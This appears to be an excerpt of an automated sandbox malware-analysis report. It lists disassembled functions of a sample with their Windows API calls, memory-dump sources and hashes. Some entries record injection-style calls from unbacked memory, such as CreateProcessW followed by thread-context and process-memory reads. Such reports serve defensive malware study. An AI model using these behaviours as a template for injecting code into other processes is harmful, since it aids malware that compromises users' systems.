                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                      • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                      • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                      Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: CALL
                      • API String ID: 0-4196123274
                      • Opcode ID: 5bf3d3e503f066cbafa41f3544c44b9081dacd38a66df359d0391d9f4f69c0c6
                      • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                      • Opcode Fuzzy Hash: 5bf3d3e503f066cbafa41f3544c44b9081dacd38a66df359d0391d9f4f69c0c6
                      • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                      Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 3ce2611c78d194cda31788c7b8dd167ac83d19a30fb3eaa8f098f7f363491ca2
                      • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                      • Opcode Fuzzy Hash: 3ce2611c78d194cda31788c7b8dd167ac83d19a30fb3eaa8f098f7f363491ca2
                      • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                      Function 02F55A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNEL32(00000000,00000000,02F555C0,?,00000000,00000000), ref: 02F55A51
                      • RtlExitUserThread.NTDLL(00000000), ref: 02F55B11
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Thread$CreateExitUser
                      • String ID:
                      • API String ID: 4108186749-0
                      • Opcode ID: 306cf5efd16a80837d24ae19c4bcc8c2aebeac02ccfbceb494f80553819726c1
                      • Instruction ID: 8ee4efddbf3c7be0008a1fdc09f3ace6e368ee3396ee45111ab40a2c9cb670e5
                      • Opcode Fuzzy Hash: 306cf5efd16a80837d24ae19c4bcc8c2aebeac02ccfbceb494f80553819726c1
                      • Instruction Fuzzy Hash: 9F115951D0D3E24EE7278B788829366BFA01F536A8F8902C6DB918E1E3D359454D87A3
                      Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      • IsThemeActive.UXTHEME ref: 00404834
                        • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                        • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                        • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                        • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                        • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                        • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                        • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                        • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                        • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 1438897964-0
                      • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                      • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                      • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                      • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                      Function 00405C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                      • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                      • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                      • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                      Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      • std::exception::exception.LIBCMT ref: 00420DEC
                      • __CxxThrowException@8.LIBCMT ref: 00420E01
                        • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                      • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                      • Opcode Fuzzy Hash: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                      • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                      Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __lock_file_memset
                      • String ID:
                      • API String ID: 26237723-0
                      • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                      • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                      • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                      • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                      Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • __lock_file.LIBCMT ref: 004253EB
                        • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                      • __fclose_nolock.LIBCMT ref: 004253F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                      • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                      • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                      • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                      Function 00408061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                        • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$_memmove
                      • String ID:
                      • API String ID: 3033907384-0
                      • Opcode ID: 2bcedb6e7c25340e9e5fe7d5c2723edcefc4ef8b8618a12247d7f771958a4bec
                      • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                      • Opcode Fuzzy Hash: 2bcedb6e7c25340e9e5fe7d5c2723edcefc4ef8b8618a12247d7f771958a4bec
                      • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                      Function 02F55D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                      Download Yara Rule
                      APIs
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02F55D6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: cd3f42101da440eb02765f8ca7a5319743a5f0aeef779ca030b4d5d9a0f70327
                      • Instruction ID: 9422d56ecadbcc7536c8eda13cfd4d74636aec25c4030765fbd9e686d1afccde
                      • Opcode Fuzzy Hash: cd3f42101da440eb02765f8ca7a5319743a5f0aeef779ca030b4d5d9a0f70327
                      • Instruction Fuzzy Hash: 44F08953E4C330EADD3E1368E95EB71BA5067026ECFCD4546EF435D0B397561856C901
                      Function 00BA3285 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 00BA3A43
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA3AD9
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00BA3AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                      • Instruction ID: 8920b7277b071fbd15c7fe95ef803d4dc88790c0690643d67a5f01e45643f6da
                      • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                      • Instruction Fuzzy Hash: 3F12EF24E18658C6EB24DF60D8507DEB272EF68700F1090E9910DEB7A5E77A4F81CF5A
                      Function 02F55F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3be41a91f74035c03d55ffe9f4af8568ab814d023375fbdfd06373bddd2e0802
                      • Instruction ID: fc4d80b3df53b7be560474ce7b8333c10ce610c2dc1e4a15ea282b2b5816f22e
                      • Opcode Fuzzy Hash: 3be41a91f74035c03d55ffe9f4af8568ab814d023375fbdfd06373bddd2e0802
                      • Instruction Fuzzy Hash: 2671D322D0C3B08FDB3647288854735BBA4AF426E8FCD4699DFA5CB1A2D3719445C792
                      Function 0040F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f1471ee549c4365769072be8de9275889442c9684ca64ac1475cfa38fccfc65
                      • Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
                      • Opcode Fuzzy Hash: 6f1471ee549c4365769072be8de9275889442c9684ca64ac1475cfa38fccfc65
                      • Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59
                      Function 00411FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a372b71ff6f2c02e8093133f0aa5e861951c86041d0aecd2edef0b22227d556
                      • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                      • Opcode Fuzzy Hash: 5a372b71ff6f2c02e8093133f0aa5e861951c86041d0aecd2edef0b22227d556
                      • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                      Function 02F56490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98aa888ccdfe3fc8845c6902ba5dae90f07c19480d7bf8d5aef18be0e3a96638
                      • Instruction ID: cf7f2cb89fe912a8539fa4e8fcc7cf77aa8addee0623e399a06139506c98ac94
                      • Opcode Fuzzy Hash: 98aa888ccdfe3fc8845c6902ba5dae90f07c19480d7bf8d5aef18be0e3a96638
                      • Instruction Fuzzy Hash: C631C961E0C3708ADF358B28C5443357BBCAF81AD8FC9869ADFB5CA2A6D7758005C752
                      Function 00405AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                      • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                      • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                      • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                      Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
